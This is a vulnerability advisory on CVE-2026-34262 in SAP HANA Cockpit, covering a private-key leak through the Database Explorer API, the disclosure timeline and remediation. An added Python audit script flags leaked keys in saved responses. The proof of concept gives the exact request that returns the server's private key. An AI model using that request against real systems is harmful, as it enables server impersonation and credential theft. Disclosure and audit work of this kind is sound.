Exposed Private Key of X.509 Certificate in SAP HANA Cockpit & SAP HANA Database Explorer

Title

Exposed Private Key of X.509 Certificate

Product

SAP HANA Cockpit & SAP HANA Database Explorer

Vulnerable Version

HANA Cockpit <2.18.2 (HRTT <2.16.254002)

Fixed Version

HANA Cockpit 2.18.2 (HRTT 2.16.254002)

CVE Number

CVE-2026-34262

Impact

high

Found

24.04.2025

By

Ben Samtleben (Office Berlin), Bernd Kaufmann (Office Vienna) | SEC Consult Vulnerability Lab

Management summary

SAP HANA Cockpit users with access to the Database Explorer could retrieve the private keys of X.509 certificates. This could be used to impersonate the application server on network level, allowing an attacker to obtain user credentials or other sensitive data. The software patch provided by SAP does not suffice to completely mitigate the security risk. The affected X.509 certificates and corresponding private keys need to be revoked and rotated manually.

Vendor description

"SAP is one of the world’s leading producers of software for the management of business processes."

Source: https://www.sap.com/about/what-is-sap.html 

"SAP HANA cockpit is the main administration tool for SAP HANA. The SAP HANA cockpit provides tools for the administration and monitoring of SAP HANA databases (databases), and for development capabilities through the SAP HANA database explorer."

Source: https://help.sap.com/docs/SAP_HANA_COCKPIT/df02d156db744412ad1f9e887aba68ad/ab5d442cc8a340fea07c15ef6f8eb537.html 

Business recommendation

The vendor provides a patch which should be installed immediately, see SAP Security Note 3730639.

This patch does not completely mitigate the risk that the private keys were obtained by an attacker in the past. Therefore, SEC Consult strongly recommends rotating the affected X.509 certificates and corresponding private keys - even if this is currently not mentioned in the SAP Security Note.

SEC Consult highly recommends performing a thorough security review of the product, conducted by security professionals, to identify and resolve potential further security issues.

Vulnerability overview/description

1) Exposed Private Key of X.509 Certificate in SAP HANA Cockpit (CVE-2026-34262)

SAP HANA Cockpit users with access to the Database Explorer can obtain the X.509 certificate issued to the application server and its corresponding private key. This information can be used to impersonate the application server on network level, allowing an attacker to obtain user credentials or other sensitive data. The issue arises if mutual TLS (mTLS) is configured for communication with the SAP HANA database.

Proof of concept

1) Exposed Private Key of X.509 Certificate in SAP HANA Cockpit (CVE-2026-34262)

When accessing the Database Explorer via the SAP HANA Cockpit, the following HTTP request is sent to the HRTT service in the background:

GET /hrtt-service/sap/hana/cst/api/v2/databases HTTP/1.1
Host: hana-cockpit-web-app.example.org:31033
Cookie: JSESSIONID=[...]
[...]

The server response contains a list of all available databases.

{
   "__count": 6,
   "d": {
       "results": [
           {
               "__metadata": {
                   "uri": "/sap/hana/cst/api/v2/databases('C123456789')",
                   "type": "database.Database"
               },
               "id": "C123456789",
               "group_id": 0,
               "catalog_name": "SID@SID",
               "type": "COCKPIT_RESOURCE",
               "disabled": false,
               "has_login": false,
               "cockpit_resource_id": 123456789,
               "database_product_name": "HANA",
               "options": {
                   "schema_filter": "[]"
               },
               "set_xs_applicationuser": true,
               "hdl_support_sof": false
           },
           // [... more entries here...]
       ]
   }
}

However, the response can vary - most likely depending on other HTTP requests that have been sent. A more verbose response can be triggered by manually interacting with the Database Explorer and then repeating the request. (No database credentials are needed.) Then, the following information is returned:

{
   "__count": 6,
   "d": {
       "results": [
           {
               "__metadata": {
                   "uri": "/sap/hana/cst/api/v2/databases('C123456789')",
                   "type": "database.Database"
               },
               "id": "C123456789",
               "group_id": 0,
               "catalog_name": "SID@SID",
               "type": "COCKPIT_RESOURCE",
               "disabled": false,
               "has_login": false,
               "cockpit_resource_id": 123456789,
               "database_product_name": "HANA",
               "cockpit_resource_name": "SID@SID",
               "options": {
                   "hosts": [
                       {
                           "host": "isidhdb01.example.org",
                           "port": "31013"
                       }
                   ],
                   "databaseName": "SID",
                   "encrypt": true,
                   "ca": [
                       "-----BEGIN CERTIFICATE-----\nMII[... certificate removed ...]zg==\n-----END CERTIFICATE-----\n",
                       "-----BEGIN CERTIFICATE-----\nMII[... certificate removed ...]c4=\n-----END CERTIFICATE-----\n",
                   ],
                   "sslValidateCertificate": true,
                   "key": [
                       "-----BEGIN PRIVATE KEY-----MII[... private key removed ...]8tQ==-----END PRIVATE KEY-----"
                   ],
                   "cert": [
                       "-----BEGIN CERTIFICATE-----MII[... certificate removed ...]QHvC-----END CERTIFICATE----------BEGIN CERTIFICATE-----MII[...]yotP-----END CERTIFICATE-----"
                   ],
                   "schema_filter": "[]"
               },
               "set_xs_applicationuser": true,
               "hdl_support_sof": false
           }
           // [... more entries here...]
       ]
   }
}

The HTTP response not only leaks additional metadata but, most importantly, an X.509 certificate chain and the private key of the leaf certificate. This certificate is issued to the application server hosting the SAP HANA Cockpit, not to the database server.

The vulnerability can be reproduced with the Cockpit Administrator and the Cockpit User role, so it does not require administrative privileges.
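The following audit routine is an added example; it is not part of the SEC Consult advisory or of SAP's code. It parses a saved response of the shape shown above (a constructed sample with placeholder PEM bodies) and flags every database entry whose options carry private key material, splitting the chain in the "cert" field even though the PEM blocks are run together without newlines, so an operator can confirm a patched Cockpit no longer returns keys and can count the certificates that need revoking.

```python
import json
import re

# Constructed sample of the /hrtt-service/sap/hana/cst/api/v2/databases
# response shape from the advisory; PEM bodies are placeholders, not real keys.
SAMPLE_RESPONSE = json.dumps({
    "d": {"results": [
        {"id": "C123456789", "catalog_name": "SID@SID",
         "options": {
             "hosts": [{"host": "isidhdb01.example.org", "port": "31013"}],
             "encrypt": True,
             "key": ["-----BEGIN PRIVATE KEY-----MIIplaceholder-----END PRIVATE KEY-----"],
             # Chain delivered as one string with the PEM blocks concatenated
             "cert": ["-----BEGIN CERTIFICATE-----MIIleaf-----END CERTIFICATE-----"
                      "-----BEGIN CERTIFICATE-----MIIissuer-----END CERTIFICATE-----"],
         }},
        {"id": "C987654321", "catalog_name": "DEV@DEV",
         "options": {"schema_filter": "[]"}},
    ]}
})

# Matches one PEM block; the backreference keeps BEGIN/END labels paired, and
# re.S lets the body span newlines when they are present.
PEM_BLOCK = re.compile(r"-----BEGIN ([A-Z ]+)-----(.*?)-----END \1-----", re.S)

def split_pem_blocks(blob):
    """Return the PEM labels (e.g. 'CERTIFICATE', 'PRIVATE KEY') found in a string,
    even when the blocks are concatenated without newlines as in the leaked field."""
    return [label for label, _ in PEM_BLOCK.findall(blob)]

def audit_databases_response(body):
    """Return one finding per database entry whose options carry private key
    material: entry id, catalog name, configured hosts, number of private keys
    and number of certificates in the accompanying chain."""
    findings = []
    for entry in json.loads(body)["d"]["results"]:
        options = entry.get("options", {})
        key_labels = [lbl for blob in options.get("key", []) for lbl in split_pem_blocks(blob)]
        if not any("PRIVATE KEY" in lbl for lbl in key_labels):
            continue  # no key material in this entry, nothing to rotate
        cert_count = sum(split_pem_blocks(b).count("CERTIFICATE") for b in options.get("cert", []))
        findings.append({
            "id": entry["id"],
            "catalog_name": entry.get("catalog_name"),
            "hosts": [f"{h['host']}:{h['port']}" for h in options.get("hosts", [])],
            "private_keys": len(key_labels),
            "chain_certificates": cert_count,
        })
    return findings

if __name__ == "__main__":
    for f in audit_databases_response(SAMPLE_RESPONSE):
        print(f"{f['id']} ({f['catalog_name']}): {f['private_keys']} private key(s), "
              f"{f['chain_certificates']} certificate(s) in chain, hosts {f['hosts']}")
```

An empty result from a response captured after applying the patch is the expected outcome; any finding identifies a key pair that must still be treated as compromised and rotated.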

Vulnerable / tested versions

The following versions are affected:

  • SAP HANA Cockpit versions prior to 2.18.2 (SAP HANA Runtime Tools prior to 2.16.254002)

Vendor contact timeline

2025-07-01 Contacting vendor through vulnerability submission web form, receiving automatic confirmation.
2025-10-13 Recontacting vendor via email after no response.
2025-10-17 Vendor responds, declaring the issue "resolved" by Aug 30 without further details.
2025-10-29 Inquiring about assigned CVE or SAP Security Note.
2025-11-12 Sending reminder after no response.
2025-11-28 Sending another reminder, still no response.
2025-12-03 Vendor responds with the version containing the patch; states that no CVE will be assigned.
2025-12-05 Contacting vendor, emphasizing that SAP Security Note and CVE are essential to inform customers and make them rotate their certificates.
2025-12-10 Vendor responds, requesting time to clarify with internal stakeholders.
2026-02-11 Contacting the vendor again, asking for any updates.
2026-02-12 Vendor responds, reiterating patched version, no mention of SAP Security Note or CVE.
2026-02-12 Reminding vendor of importance of notifying affected customers due to required certificate rotation.
2026-02-25 Contacting MITRE regarding CVE assignment dispute.
2026-02-27 Vendor agrees to issue an SAP Security Note and asks to postpone public disclosure.
2026-04-14 SAP Security Note 3730639 (CVE-2026-34262) is published by the vendor.
2026-04-15 Public release of advisory.

Solution

According to SAP, the vulnerability was fixed in SAP HANA Cockpit version 2.18.2 (HRTT version 2.16.254002).
For information on the available patch, please see SAP Security Note 3730639.

However, this does not completely mitigate the risk that the private keys were obtained by an attacker in the past. Therefore, SEC Consult strongly recommends rotating the affected X.509 certificates and corresponding private keys - even if this is currently not mentioned in the SAP Security Note.

Workaround

None

Advisory URL

https://sec-consult.com/vulnerability-lab/

 

EOF Ben Samtleben, Bernd Kaufmann / @2026
